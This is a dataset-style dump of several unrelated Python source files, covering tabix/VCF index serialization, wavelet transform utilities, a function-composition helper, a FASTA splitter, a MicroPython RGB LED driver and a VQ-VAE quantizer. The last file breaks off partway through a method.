max_stars_repo_path (string, len 3-269) | max_stars_repo_name (string, len 4-119) | max_stars_count (int64, 0-191k) | id (string, len 1-7) | content (string, len 6-1.05M) | score (float64, 0.23-5.13) | int_score (int64, 0-5)
---|---|---|---|---|---|---|
tabixpy/_io.py | bejobioinformatics/tabixpy | 3 | 12795651 | <gh_stars>1-10
import gzip
import json
import struct
import hashlib
from ._logger import logger, getLogLevel
from ._gzip import GZIP_MAGIC
from ._consts import (
COMPRESS,
)
from ._consts import (
TABIX_EXTENSION,
)
from ._consts import (
TABIXPY_FORMAT_NAME,
TABIXPY_FORMAT_VER,
TABIXPY_EXTENSION
)
from ._consts import (
VCFBGZ_FORMAT_VER,
VCFBGZ_FORMAT_NAME,
VCFBGZ_EXTENSION,
VCFBGZ_EOF
)
BIN_SIZES = [
[ 0, 2** 8, 'B' ], # char 1
[ -2** 7, 2** 7, 'b' ], # char 1
[ 0, 2**16, 'H' ], # short unsigned 2
[ -2**15, 2**15, 'h' ], # short 2
[ 0, 2**32, 'L' ], # long unsigned 4
[ -2**31, 2**31, 'l' ], # long 4
[ 0, 2**64, 'Q' ], # long long unsigned 8
[ -2**63, 2**63, 'q' ], # long long 8
]
def getByteSize(vals):
for (min_val, max_val, code) in BIN_SIZES:
if all([x >= min_val and x < max_val for x in vals]):
return code
raise ValueError(f"not able to encode values {vals}")
def genStructValueGetter(fhd, returnBytes=False):
def getValues(fmt):
fmt_s = struct.calcsize(fmt)
pack = fhd.read(fmt_s)
res = struct.unpack(fmt, pack)
if returnBytes:
return res, pack
else:
return res
return getValues
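# --- Illustrative usage sketch (editor's addition, not part of the original tabixpy module) ---
# genStructValueGetter() wraps a binary file handle so callers can read and unpack a
# struct format in one call, optionally keeping the raw bytes (used below to feed the
# SHA-256 checksum while the index is loaded).
def _demo_genStructValueGetter():
    """Illustration only; never called by the module."""
    import io
    getter = genStructValueGetter(io.BytesIO(struct.pack("<qq", 7, 42)), returnBytes=True)
    (values, raw) = getter("<q")
    assert values == (7,) and len(raw) == 8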
def getFilenames(infile):
if infile[-3:] == '.gz' or infile[-4:] == '.bgz':
ingz = infile
else:
ingz = infile[:-4]
    inid = ingz + TABIX_EXTENSION  # attach the index extension to the .gz name to avoid doubling an extension
inbj = ingz + TABIXPY_EXTENSION
inbk = ingz + VCFBGZ_EXTENSION
assert not ingz.endswith(".")
return ingz, inid, inbj, inbk
def saveTabixPy(ingz, data, compress=COMPRESS):
data["__format_name__"] = TABIXPY_FORMAT_NAME
data["__format_ver__" ] = TABIXPY_FORMAT_VER
outfileJ = ingz + TABIXPY_EXTENSION
logger.info(f"saving {outfileJ}")
opener = open
if compress:
logger.debug("compressing")
opener = gzip.open
with opener(outfileJ, "wt") as fhd:
json.dump(data, fhd, indent=1)
def loadTabixPy(ingz):
(ingz, inid, inbj, inbk) = getFilenames(ingz)
compressed = None
with open(inbj, "rb") as fhd:
firstChars = fhd.read(2)
if firstChars[0] == 123: # { 123
compressed = False
else:
assert firstChars == GZIP_MAGIC, firstChars
compressed = True
is_compressed = "compressed json" if compressed else "json"
logger.info(f"loading {inbj} as {is_compressed}")
data = None
if compressed:
with gzip.open(inbj, "rb") as fhd:
data = json.load(fhd)
else:
with open(inbj, "rt") as fhd:
data = json.load(fhd)
assert "__format_name__" in data
assert "__format_ver__" in data
assert data["__format_name__"] == TABIXPY_FORMAT_NAME
assert data["__format_ver__" ] == TABIXPY_FORMAT_VER
return data
def saveVcfGzPy(filename, data, compress=COMPRESS):
outfile = filename + VCFBGZ_EXTENSION
logger.info(f" saving {outfile}")
flatten = lambda lst: (item for sublist in lst for item in sublist)
chromLength = data["chromLength"]
header = {
"chroms" : data["chroms"],
"numCols" : data["numCols"],
"chromSizes" : data["chromSizes"],
"chromLength": data["chromLength"]
}
headerJ = json.dumps(header)
header_fmts = [
["q" , len(VCFBGZ_FORMAT_NAME) ],
[f"{len(VCFBGZ_FORMAT_NAME)}s", VCFBGZ_FORMAT_NAME.encode() ],
["q" , VCFBGZ_FORMAT_VER ],
["q" , len(headerJ) ],
[f"{len(headerJ)}s" , headerJ.encode() ]
]
m = hashlib.sha256()
header_fmt = "<" + "".join([h[0] for h in header_fmts])
logger.debug(f"header_fmt '{header_fmt}'")
header_val = [h[1] for h in header_fmts]
header_dat = struct.pack(header_fmt, *header_val )
logger.debug(header_dat)
logger.debug(header_val)
m.update(header_dat)
if getLogLevel() == "DEBUG":
header_rev = struct.unpack(header_fmt, header_dat)
header_rev = list(header_rev)
logger.debug(header_rev)
assert header_rev == header_val
opener = open
if compress:
logger.info(" compressing")
opener = gzip.open
with opener(outfile, 'wb') as fhd:
fhd.write(header_dat)
for lstK in ["realPositions", "firstPositions", "lastPositions", "numberRows"]:
logger.info(f" writing {lstK:16s} - {chromLength:18,d}")
lst = data[lstK]
for chrom_data in lst:
# logger.info(f"chrom_data {chrom_data[:10]} {chrom_data[-10:]}")
cdsum = sum(chrom_data)
st = chrom_data[0]
chrom_data = [st] + [v - chrom_data[c] for c,v in enumerate(chrom_data[1:])]
# logger.info(f"chrom_data {chrom_data[:10]} {chrom_data[-10:]}")
fmt = getByteSize(chrom_data)
fms = f"<qc{len(chrom_data)}{fmt}"
logger.info(f" fmt {fmt} min {min(chrom_data):15,d} max {max(chrom_data):15,d} len {len(chrom_data):18,d} cdsum {cdsum:21,d} fmts {fms}")
lstD = struct.pack(fms, cdsum, fmt.encode(), *chrom_data)
# lstD = struct.pack(f"<{len(chrom_data)}q" , *chrom_data)
fhd.write(lstD)
m.update(lstD)
# sys.exit(0)
# lstD = struct.pack(f"<{chromLength}q" , *flatten(lst))
# fhd.write(lstD)
# m.update(lstD)
digestHex = m.hexdigest()
digestLen = len(digestHex)
digestSize = struct.pack(f"<q", digestLen)
m.update(digestSize)
fhd.write(digestSize)
digestHex = m.hexdigest()
digest = struct.pack(f"<{digestLen}s", digestHex.encode())
fhd.write(digest)
logger.info(digestHex)
fhd.write(VCFBGZ_EOF)
return
def loadVcfGzPy(filename):
indexFile = filename + VCFBGZ_EXTENSION
logger.info(f" loading {indexFile}")
m = hashlib.sha256()
compressed = None
with open(indexFile, "rb") as fhd:
firstChars = fhd.read( 8 + len(VCFBGZ_FORMAT_NAME) )
compressed = None
if firstChars[:2] == GZIP_MAGIC:
compressed = True
else:
fmt = firstChars[8:]
try:
fmt = fmt.decode()
except:
raise ValueError(f"not a valid uncompressed file. invalid magic header: {fmt}. expected {GZIP_MAGIC} OR {VCFBGZ_FORMAT_NAME}")
if fmt == VCFBGZ_FORMAT_NAME:
compressed = False
else:
raise ValueError(f"not a valid uncompressed file. invalid magic header: {fmt}. expected {GZIP_MAGIC} OR {VCFBGZ_FORMAT_NAME}")
if compressed is None:
raise ValueError(f"not a valid uncompressed file. invalid magic header: {fmt}. expected {GZIP_MAGIC} OR {VCFBGZ_FORMAT_NAME}")
opener = open
if compressed:
logger.info(" decompressing")
opener = gzip.open
with opener(indexFile, 'rb') as fhd:
getter = genStructValueGetter(fhd, returnBytes=True)
((fmt_len, ), d) = getter("<q")
m.update(d)
logger.debug(f" fmt_len {fmt_len}")
assert fmt_len == len(VCFBGZ_FORMAT_NAME), f"fmt_len {fmt_len} == len(VCFBGZ_FORMAT_NAME) {len(VCFBGZ_FORMAT_NAME)}"
((fmt_nam, ), d) = getter(f"<{fmt_len}s")
m.update(d)
fmt_nam = fmt_nam.decode()
logger.debug(f" fmt_nam {fmt_nam}")
assert fmt_nam == VCFBGZ_FORMAT_NAME, f"fmt_nam {fmt_nam} == VCFBGZ_FORMAT_NAME {VCFBGZ_FORMAT_NAME}"
((fmt_ver, ), d) = getter("<q")
m.update(d)
logger.debug(f" fmt_ver {fmt_ver}")
assert fmt_ver == VCFBGZ_FORMAT_VER, f"fmt_ver {fmt_ver} == VCFBGZ_FORMAT_VER {VCFBGZ_FORMAT_VER}"
((lenHeaderJ, ), d) = getter("<q")
m.update(d)
logger.debug(f" lenHeaderJ {lenHeaderJ}")
((headerJ, ), d) = getter(f"<{lenHeaderJ}s")
m.update(d)
headerJ = headerJ.decode()
header = json.loads(headerJ)
logger.debug(f" header {header}")
chromLength = header["chromLength"]
for lstK in ["realPositions", "firstPositions", "lastPositions", "numberRows"]:
logger.info(f" reading {lstK}")
header[lstK] = []
for chromSize in header["chromSizes"]:
logger.info(f" {chromSize:12,d} values")
((cdsum,), d) = getter(f"<q")
m.update(d)
((fmt,), d) = getter(f"<c")
m.update(d)
# logger.info(f"cdsum {cdsum} fmt {fmt}")
(chrom_data, d) = getter(f"<{chromSize}{fmt.decode()}")
m.update(d)
chrom_data = list(chrom_data)
# logger.info(f"chrom_data {chrom_data[:10]} {chrom_data[-10:]}")
for c in range(1,len(chrom_data)):
chrom_data[c] = chrom_data[c] + chrom_data[c-1]
# logger.info(f"chrom_data {chrom_data[:10]} {chrom_data[-10:]}")
if cdsum == 0: #pypy
assert sum(chrom_data) == -1, f"sum(chrom_data) {sum(chrom_data)} == cdsum {cdsum}"
else:
assert sum(chrom_data) == cdsum, f"sum(chrom_data) {sum(chrom_data)} == cdsum {cdsum}"
header[lstK].append(chrom_data)
((digestLen, ), d) = getter("<q")
m.update(d)
logger.debug(f"digestLen {digestLen}")
((digestHex, ), _) = getter(f"<{digestLen}s")
digestHex = digestHex.decode()
logger.info(f"digestHex {digestHex}")
assert digestHex == m.hexdigest()
eof = fhd.read(len(VCFBGZ_EOF))
assert eof == VCFBGZ_EOF
assert len(fhd.read()) == 0
return header
| 2.15625 | 2 |
analyze/wavelet/base.py | ivanovwaltz/wavelet_sound_microscope | 0 | 12795652 | <filename>analyze/wavelet/base.py
from functools import partial
from itertools import chain, tee
import logging
import numpy as np
log = logging.getLogger(__name__)
PI2 = 2 * np.pi
def pairwise(iterable):
one, two = tee(iterable)
next(two, None)
return zip(one, two)
def grouper(iterable, n):
return zip(*([iter(iterable)] * n))
def test_split_vertical():
i, j = split_vertical([[1, 2], [3, 4]])
assert i.tolist() == [[1], [3]]
assert j.tolist() == [[2], [4]]
def split_vertical(mat):
mat = np.asarray(mat)
    half = mat.shape[1] // 2  # integer division keeps the slice indices integral
return mat[:, :half], mat[:, half:]
def test_iconcatenate_pairs():
pairs = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
assert [list(r) for r in iconcatenate_pairs(pairs)] == \
[
[1, 2, 3, 4, 5, 6],
[4, 5, 6, 7, 8, 9],
]
def iconcatenate_pairs(items):
for pair in pairwise(items):
yield np.concatenate(pair)
def is_power_of_two(val):
return val and val & (val - 1) == 0
def gen_halfs(arrays, size):
halfsize = size // 2
for array in arrays:
pair = split_array(array, halfsize)
for j in filter(len, pair):
yield j
def test_gen_halfs():
d = [ [1,2,3,4], [5,6,7], ]
assert list(gen_halfs(d, 4)) == [[1, 2], [3, 4], [5, 6], [7]]
def split_array(array, where):
return array[:where], array[where:]
def map_only_last(fn, iterable):
items = iter(iterable)
last = next(items)
for elem in items:
yield last
last = elem
yield fn(last)
def test_map_only_last():
mapped = map_only_last(lambda x: x+1, range(3))
assert list(mapped) == [0, 1, 3]
class NumpyPadder(object):
def __init__(self, size):
self.size = size
def __call__(self, array):
self.original_size = len(array)
self.pad_size = self.size - self.original_size
if self.pad_size == 0:
return array
elif self.pad_size > 0:
return np.pad(array, (0, self.pad_size), 'constant')
        raise ValueError('pad size < 0: the input block is longer than the configured padder size')
class BaseWaveletBox(object):
def __init__(self, nsamples, samplerate, scale_resolution, omega0):
if not is_power_of_two(nsamples):
raise Exception(u'nsamples must be power of two')
self.nsamples = nsamples
self.omega0 = omega0
self.scales = autoscales(nsamples, samplerate,
scale_resolution, omega0)
self.angular_frequencies = angularfreq(nsamples, samplerate)
@property
def frequencies(self):
# Set coefficient in accordance with wavelet type
return 11 * (self.omega0 / 70) / self.scales
def sound_apply_cwt(self, sound, progressbar, **kwargs):
blocks = sound.get_blocks(self.nsamples)
# blocks = sound.get_blocks(self.nsamples//2)
with progressbar(blocks) as blocks_:
return self._apply_cwt(blocks_, progressbar, **kwargs)
def _apply_cwt(self, blocks, progressbar, decimate, **kwargs):
half_nsamples = self.nsamples // 2
chunks = gen_halfs(blocks, self.nsamples)
padder = NumpyPadder(half_nsamples)
equal_sized_pieces = map_only_last(padder, chunks)
zero_pad = np.zeros(half_nsamples)
overlapped_blocks = iconcatenate_pairs(
chain([zero_pad], equal_sized_pieces, [zero_pad])
)
        window = np.hanning(self.nsamples)
        windowed_pieces = (block * window for block in overlapped_blocks)
complex_images = [
self.cwt(windowed_piece, decimate, **kwargs)
for windowed_piece in windowed_pieces
]
halfs = chain.from_iterable(map(split_vertical, complex_images))
next(halfs)
overlapped_halfs = [left + right for left, right in grouper(halfs, 2)]
# Cut pad size from last
last_image_size = padder.original_size // decimate
overlapped_halfs[-1] = overlapped_halfs[-1][:, :last_image_size]
return np.concatenate(overlapped_halfs, axis=1)
def angularfreq(nsamples, samplerate):
""" Compute angular frequencies """
angfreq = np.arange(nsamples, dtype=np.float32)
    angfreq[-nsamples // 2 + 1:] -= nsamples
angfreq *= samplerate * PI2 / nsamples
return angfreq
# Чем больше, тем больше октав снизу будет отброшено
LOWER_FQ_LIMIT_COEFF = 0.5
def autoscales(samples_count, samplerate, scale_resolution, omega0):
""" Compute scales as fractional power of two """
# morle_samples - количество отсчетов для базового вейвлета
morle_samples = (omega0 + np.sqrt(2 + omega0 ** 2)) / PI2
# scale - измеряется в секундах
minimal_scale = morle_samples / samplerate
# сколько базовых вейвлетов поместится (диапазон частот)
freq_interval = samples_count / morle_samples
skip_n_lower_octaves = LOWER_FQ_LIMIT_COEFF * samples_count / samplerate
skipped_low_freq_interval = max(1, 2**skip_n_lower_octaves)
visible_freq_interval = freq_interval / skipped_low_freq_interval
maximal_scale = np.log2(visible_freq_interval)
indexes_count = int(np.floor(maximal_scale / scale_resolution))
indexes = np.arange(indexes_count + 1, dtype=np.float32)
logarithmic_indexes = 2 ** (indexes * scale_resolution)
return minimal_scale * logarithmic_indexes
| 2.65625 | 3 |
melody.py | phinate/melody | 0 | 12795653 | import functools
import inspect
import equinox
from typing import Callable, Iterable
def compose(workflow: Iterable[Callable], do_jit: bool=False) -> Callable:
def pipeline(*args, **kwargs): # *args are for grad, **kwargs are the rest
res = dict([])
for f in workflow:
sig = inspect.signature(f)
f_args = sig.parameters.keys()
feed_args = False
feed_kwargs = False
arglist = []
for arg in f_args:
if not feed_args or not feed_kwargs:
if arg in kwargs.keys() and arg not in res.keys():
feed_kwargs = True
arglist.append(arg)
elif arg not in kwargs.keys() and arg not in res.keys():
feed_args = True
elif arg in kwargs.keys() and arg in res.keys():
raise Exception(f'the keyword \'{arg}\' is already specified in the workflow')
else:
break
f_kwargs = {k:kwargs[k] for k in arglist}
if feed_args and feed_kwargs:
res = f(*args, **res, **f_kwargs)
elif feed_args and not feed_kwargs:
res = f(*args, **res)
elif not feed_args and feed_kwargs:
res = f(**res, **f_kwargs)
else:
res = f(**res)
return res
# not really too helpful, since can't parse which of these are free params...
workflow_pars = []
for i, f in enumerate(workflow):
sig = inspect.signature(f)
workflow_pars += list(sig.parameters.values())
workflow_pars = sorted(workflow_pars, key=lambda x: 0 if x.default is inspect.Parameter.empty else 1)
# print(workflow_pars)
last_sig = inspect.signature(workflow[-1])
an = last_sig.return_annotation
pipeline.__signature__ = inspect.Signature(workflow_pars, return_annotation=an)
if do_jit:
return equinox.filter_jit(
pipeline,
filter_spec=equinox.is_array,
filter_spec_return=equinox.is_array
)
else:
return pipeline
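# --- Illustrative usage sketch (editor's addition); the two step functions are hypothetical ---
# compose() chains callables into one pipeline: named **kwargs are routed to steps by
# parameter name, and each step's returned dict is unpacked as keyword arguments for
# the next step.
def _demo_compose():
    """Illustration only; never called by the module."""
    def load(path: str) -> dict:
        return {"data": [1, 2, 3]}

    def rescale(data, factor=2) -> dict:
        return {"result": [x * factor for x in data]}

    pipeline = compose([load, rescale])
    assert pipeline(path="events.json")["result"] == [2, 4, 6]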
| 2.25 | 2 |
tools/splitfasta/split_fasta.py | pavanvidem/galaxytools | 0 | 12795654 | <gh_stars>0
#!/usr/bin/env python
import os
import sys
from Bio import SeqIO
num_chunks = 0
if len(sys.argv) == 3:
num_chunks = int(sys.argv[2])
input_filename = sys.argv[1]
elif len(sys.argv) == 2:
input_filename = sys.argv[1]
else:
exit("Usage: split_fasta.py <input_filename> [<num_chunks>]")
os.mkdir("splits")
if num_chunks != 0:
# if splitting into chunks we need to count how many records are in the
# input file
record_count = 0
with open(input_filename) as input_file:
for line in input_file:
if line.lstrip().startswith(">"):
record_count += 1
records_per_chunk = round(float(record_count) / num_chunks)
count = 1
with open(input_filename) as input_file:
chunk_record_count = 0 # how many lines have we written to the output file
records = []
for record in SeqIO.parse(input_file, "fasta"):
records.append(record)
if num_chunks == 0 or (
count < num_chunks and len(records) >= records_per_chunk
):
if num_chunks == 0:
output_filename = os.path.join("splits", record.id)
else:
output_filename = os.path.join("splits", "part{}".format(count))
SeqIO.write(records, output_filename, "fasta")
count += 1
records = []
if records:
# this only applies for the mode where input file is
# split into chunks
output_filename = os.path.join("splits", "part{}".format(count))
SeqIO.write(records, output_filename, "fasta")
| 3.296875 | 3 |
RGBLed_lib.py | sonmezarda/RGB-LED-Library | 0 | 12795655 | <filename>RGBLed_lib.py
#rgb led lib
from machine import PWM, Pin
import utime
def convert(x, in_min, in_max, out_min, out_max):
return (x - in_min) * (out_max - out_min) // (in_max - in_min) + out_min
class RGBLed:
anode = 'anode'
cathode = 'cathode'
def __init__(self, red_pin, green_pin, blue_pin, ledType, currentValueR = 0, currentValueG = 0, currentValueB=0):
self.red_pin = red_pin
self.green_pin = green_pin
self.blue_pin = blue_pin
self.ledType = ledType
self.currentValueR = currentValueR
self.currentValueG = currentValueG
self.currentValueB = currentValueB
        self.setColor(currentValueR, currentValueG, currentValueB)
def show(self):
print("Red Pin:", self.red_pin)
print("Green Pin:", self.green_pin)
print("Blue Pin:", self.blue_pin)
print("Led Type:",self.ledType)
print("Current Red Value:",self.currentValueR)
print("Current Green Value:",self.currentValueG)
print("Current Blue Value:",self.currentValueB)
def setColor(self,r,g,b):
if self.ledType == 'anode':
self.currentValueR = r
self.currentValueG = g
self.currentValueB = b
r = convert(r,0,255,65534,0)
g = convert(g,0,255,65534,0)
b = convert(b,0,255,65534,0)
red_pin_pwm = PWM(Pin(self.red_pin))
green_pin_pwm = PWM(Pin(self.green_pin))
blue_pin_pwm = PWM(Pin(self.blue_pin))
red_pin_pwm.duty_u16(r)
green_pin_pwm.duty_u16(g)
blue_pin_pwm.duty_u16(b)
elif self.ledType == 'cathode':
self.currentValueR = r
self.currentValueG = g
self.currentValueB = b
r = convert(r,0,255,0,65534)
g = convert(g,0,255,0,65534)
b = convert(b,0,255,0,65534)
red_pin_pwm = PWM(Pin(self.red_pin))
green_pin_pwm = PWM(Pin(self.green_pin))
blue_pin_pwm = PWM(Pin(self.blue_pin))
red_pin_pwm.duty_u16(r)
green_pin_pwm.duty_u16(g)
blue_pin_pwm.duty_u16(b)
def off(self):
self.setColor(0,0,0)
def white(self):
self.setColor(255,255,255)
def yellow(self):
self.setColor(255,255,0)
def magenta(self):
self.setColor(255,0,255)
def cyan(self):
self.setColor(0,255,255)
def slowSet(self,r,g,b,delay = 0.01):
if r>self.currentValueR:
rStep = 1
else:
            rStep = -1
if g>self.currentValueG:
gStep = 1
else:
gStep = -1
if b>self.currentValueB:
bStep = 1
else:
bStep = -1
if self.ledType == 'anode':
for i in range(self.currentValueR,r,rStep):
x = convert(i,0,255,65534,0)
red_pin_pwm = PWM(Pin(self.red_pin))
red_pin_pwm.duty_u16(x)
utime.sleep(delay)
for i in range(self.currentValueG,g,gStep):
x = convert(i,0,255,65534,0)
green_pin_pwm = PWM(Pin(self.green_pin))
green_pin_pwm.duty_u16(x)
utime.sleep(delay)
for i in range(self.currentValueB,b,bStep):
x = convert(i,0,255,65534,0)
blue_pin_pwm = PWM(Pin(self.blue_pin))
blue_pin_pwm.duty_u16(x)
utime.sleep(delay)
elif self.ledType == 'cathode':
for i in range(self.currentValueR,r,rStep):
x = convert(i,0,255,0,65534)
red_pin_pwm = PWM(Pin(self.red_pin))
red_pin_pwm.duty_u16(x)
utime.sleep(delay)
for i in range(self.currentValueG,g,gStep):
x = convert(i,0,255,0,65534)
green_pin_pwm = PWM(Pin(self.green_pin))
green_pin_pwm.duty_u16(x)
utime.sleep(delay)
for i in range(self.currentValueB,b,bStep):
x = convert(i,0,255,0,65534)
blue_pin_pwm = PWM(Pin(self.blue_pin))
blue_pin_pwm.duty_u16(x)
utime.sleep(delay)
self.currentValueR = r
self.currentValueG = g
self.currentValueB = b
        self.setColor(r, g, b)
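# --- Illustrative usage sketch (editor's addition); the GPIO numbers are hypothetical ---
# Wire the three channels to PWM-capable pins, pick 'anode' or 'cathode' to match the
# LED wiring, then drive 0-255 colour values; slowSet() fades one channel at a time.
def _demo_rgb_led():
    """Illustration only; needs a MicroPython board providing machine.PWM."""
    led = RGBLed(red_pin=13, green_pin=14, blue_pin=15, ledType=RGBLed.cathode)
    led.setColor(255, 0, 0)        # solid red
    led.slowSet(0, 0, 255, 0.005)  # fade towards blue
    led.off()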
| 3.421875 | 3 |
local/model_vqvae.py | blackbawx/SILA-Switching_Identificationy_by_Latent_Articulation | 1 | 12795656 | <filename>local/model_vqvae.py<gh_stars>1-10
import os, sys
FALCON_DIR = os.environ.get('FALCONDIR')
sys.path.append(FALCON_DIR)
from models import *
from layers import *
from util import *
from model import *
class quantizer_kotha_arff(nn.Module):
"""
Input: (B, T, n_channels, vec_len) numeric tensor n_channels == 1 usually
Output: (B, T, n_channels, vec_len) numeric tensor
"""
def __init__(self, n_channels, n_classes, vec_len, normalize=False, scale=None, assistant=None):
super().__init__()
if normalize:
target_scale = scale if scale is not None else 0.06
self.embedding_scale = target_scale
self.normalize_scale = target_scale
else:
self.embedding_scale = 1e-3 #1e-3
self.normalize_scale = None
self.embedding0_2classes = nn.Parameter(torch.randn(n_channels, 2, vec_len, requires_grad=True) * self.embedding_scale)
self.embedding0_3classes = nn.Parameter(torch.randn(n_channels, 3, vec_len, requires_grad=True) * self.embedding_scale)
self.embedding0_4classes = nn.Parameter(torch.randn(n_channels, 4, vec_len, requires_grad=True) * self.embedding_scale)
self.embedding0_nclasses = nn.Parameter(torch.randn(n_channels, 16, vec_len, requires_grad=True) * self.embedding_scale)
self.offset = torch.arange(n_channels).cuda() * n_classes
# self.offset: (n_channels) long tensor
self.n_classes = n_classes
self.after_update()
self.plot_histogram = 0
self.assistant = assistant
def forward(self, x0, chunk_size=512):
fig = None
if self.normalize_scale:
target_norm = self.normalize_scale * math.sqrt(x0.size(3))
x = target_norm * x0 / x0.norm(dim=3, keepdim=True)
embedding_2classes = target_norm * self.embedding0_2classes / self.embedding0_2classes.norm(dim=2, keepdim=True)
embedding_3classes = target_norm * self.embedding0_3classes / self.embedding0_3classes.norm(dim=2, keepdim=True)
embedding_4classes = target_norm * self.embedding0_4classes / self.embedding0_4classes.norm(dim=2, keepdim=True)
embedding_nclasses = target_norm * self.embedding0_nclasses / self.embedding0_nclasses.norm(dim=2, keepdim=True)
else:
x = x0
embedding_2classes = self.embedding0_2classes
embedding_3classes = self.embedding0_3classes
embedding_4classes = self.embedding0_4classes
embedding_nclasses = self.embedding0_nclasses
#logger.log(f'std[x] = {x.std()}')
x1 = x.reshape(x.size(0) * x.size(1), x.size(2), 1, x.size(3))
# x1: (N*samples, n_channels, 1, vec_len) numeric tensor
#print("Shape of x1 and embedding: ", x1.shape, embedding.shape)
# Perform chunking to avoid overflowing GPU RAM.
index_chunks_2classes = []
index_chunks_3classes = []
index_chunks_4classes = []
index_chunks_nclasses = []
for x1_chunk in x1.split(chunk_size, dim=0):
#print("Shapes of x1_chunk, embedding_2classes, embedding_3classes and embedding_4classes: ", x1_chunk[:,:,:,:63].shape, embedding_2classes.shape, embedding_3classes.shape, embedding_4classes.shape)
index_chunks_2classes.append((x1_chunk[:, :,:, 0:64] - embedding_2classes).norm(dim=3).argmin(dim=2))
index_chunks_3classes.append((x1_chunk[:, :,:,64:128] - embedding_3classes).norm(dim=3).argmin(dim=2))
index_chunks_4classes.append((x1_chunk[:,:,:,128:192] - embedding_4classes).norm(dim=3).argmin(dim=2))
index_chunks_nclasses.append((x1_chunk[:,:,:,192:256] - embedding_nclasses).norm(dim=3).argmin(dim=2))
index_2classes = torch.cat(index_chunks_2classes, dim=0)
index_3classes = torch.cat(index_chunks_3classes, dim=0)
index_4classes = torch.cat(index_chunks_4classes, dim=0)
index_nclasses = torch.cat(index_chunks_nclasses, dim=0)
# index: (N*samples, n_channels) long tensor
hist_2classes = index_2classes.float().cpu().histc(bins=2, min=-0.5, max=1.5)
hist_3classes = index_3classes.float().cpu().histc(bins=3, min=-0.5, max=2.5)
hist_4classes = index_4classes.float().cpu().histc(bins=4, min=-0.5, max=3.5)
hist_nclasses = index_nclasses.float().cpu().histc(bins=64, min=-0.5, max=3.5)
if self.plot_histogram:
assert self.assistant is not None
hists = hist_2classes.cpu().numpy()
fig = plt.figure()
# https://stackoverflow.com/questions/51473993/plot-an-histogram-with-y-axis-as-percentage-using-funcformatter
plt.hist(hists, weights=np.ones(2) / 2)
plt.gca().yaxis.set_major_formatter(PercentFormatter(1))
self.assistant.log_image('latent_histograms_2classes', fig)
hists = hist_3classes.cpu().numpy()
fig = plt.figure()
# https://stackoverflow.com/questions/51473993/plot-an-histogram-with-y-axis-as-percentage-using-funcformatter
plt.hist(hists, weights=np.ones(3) / 3)
plt.gca().yaxis.set_major_formatter(PercentFormatter(1))
self.assistant.log_image('latent_histograms_3classes', fig)
plt.close()
hists = hist_4classes.cpu().numpy()
fig = plt.figure()
# https://stackoverflow.com/questions/51473993/plot-an-histogram-with-y-axis-as-percentage-using-funcformatter
plt.hist(hists, weights=np.ones(4) / 4)
plt.gca().yaxis.set_major_formatter(PercentFormatter(1))
self.assistant.log_image('latent_histograms_4classes', fig)
plt.close()
hists = hist_nclasses.cpu().numpy()
fig = plt.figure()
# https://stackoverflow.com/questions/51473993/plot-an-histogram-with-y-axis-as-percentage-using-funcformatter
plt.hist(hists, weights=np.ones(64) / 64)
plt.gca().yaxis.set_major_formatter(PercentFormatter(1))
self.assistant.log_image('latent_histograms_nclasses', fig)
plt.close()
self.plot_histogram = 0
prob_2classes = hist_2classes.masked_select(hist_2classes > 0) / len(index_2classes)
entropy_2classes = - (prob_2classes * prob_2classes.log()).sum().item()
prob_3classes = hist_3classes.masked_select(hist_3classes > 0) / len(index_3classes)
entropy_3classes = - (prob_3classes * prob_3classes.log()).sum().item()
prob_4classes = hist_4classes.masked_select(hist_4classes > 0) / len(index_4classes)
entropy_4classes = - (prob_4classes * prob_4classes.log()).sum().item()
prob_nclasses = hist_nclasses.masked_select(hist_nclasses > 0) / len(index_nclasses)
entropy_nclasses = - (prob_nclasses * prob_nclasses.log()).sum().item()
index1_2classes = (index_2classes + self.offset).view(index_2classes.size(0) * index_2classes.size(1))
index1_3classes = (index_3classes + self.offset).view(index_3classes.size(0) * index_3classes.size(1))
index1_4classes = (index_4classes + self.offset).view(index_4classes.size(0) * index_4classes.size(1))
index1_nclasses = (index_nclasses + self.offset).view(index_nclasses.size(0) * index_nclasses.size(1))
# index1: (N*samples*n_channels) long tensor
output_flat_2classes = embedding_2classes.view(-1, embedding_2classes.size(2)).index_select(dim=0, index=index1_2classes)
output_flat_3classes = embedding_3classes.view(-1, embedding_3classes.size(2)).index_select(dim=0, index=index1_3classes)
output_flat_4classes = embedding_4classes.view(-1, embedding_4classes.size(2)).index_select(dim=0, index=index1_4classes)
output_flat_nclasses = embedding_nclasses.view(-1, embedding_nclasses.size(2)).index_select(dim=0, index=index1_nclasses)
# output_flat: (N*samples*n_channels, vec_len) numeric tensor
output_2classes = output_flat_2classes.view(x.shape[0], x.shape[1], x.shape[2], -1)
output_3classes = output_flat_3classes.view(x.shape[0], x.shape[1], x.shape[2], -1)
output_4classes = output_flat_4classes.view(x.shape[0], x.shape[1], x.shape[2], -1)
output_nclasses = output_flat_nclasses.view(x.shape[0], x.shape[1], x.shape[2], -1)
output = torch.cat([output_2classes, output_3classes, output_4classes, output_nclasses], dim=-1)
#print("Shape of output and x: ", output.shape, x.shape, output_2classes.shape)
out0 = (output - x).detach() + x
out1 = (x.detach() - output).float().norm(dim=3).pow(2)
out2 = (x - output.detach()).float().norm(dim=3).pow(2) + (x - x0).float().norm(dim=3).pow(2)
#logger.log(f'std[embedding0] = {self.embedding0.view(-1, embedding.size(2)).index_select(dim=0, index=index1).std()}')
return (out0, out1, out2, entropy_2classes, entropy_3classes, entropy_4classes, entropy_nclasses)
def after_update(self):
if self.normalize_scale:
with torch.no_grad():
target_norm = self.embedding_scale * math.sqrt(self.embedding0_2classes.size(2))
self.embedding0_2classes.mul_(target_norm / self.embedding0_2classes.norm(dim=2, keepdim=True))
target_norm = self.embedding_scale * math.sqrt(self.embedding0_3classes.size(2))
self.embedding0_3classes.mul_(target_norm / self.embedding0_3classes.norm(dim=2, keepdim=True))
target_norm = self.embedding_scale * math.sqrt(self.embedding0_4classes.size(2))
self.embedding0_4classes.mul_(target_norm / self.embedding0_4classes.norm(dim=2, keepdim=True))
target_norm = self.embedding_scale * math.sqrt(self.embedding0_nclasses.size(2))
self.embedding0_nclasses.mul_(target_norm / self.embedding0_nclasses.norm(dim=2, keepdim=True))
def get_quantizedindices(self, x0, chunk_size=512):
fig = None
if self.normalize_scale:
target_norm = self.normalize_scale * math.sqrt(x0.size(3))
x = target_norm * x0 / x0.norm(dim=3, keepdim=True)
embedding_2classes = target_norm * self.embedding0_2classes / self.embedding0_2classes.norm(dim=2, keepdim=True)
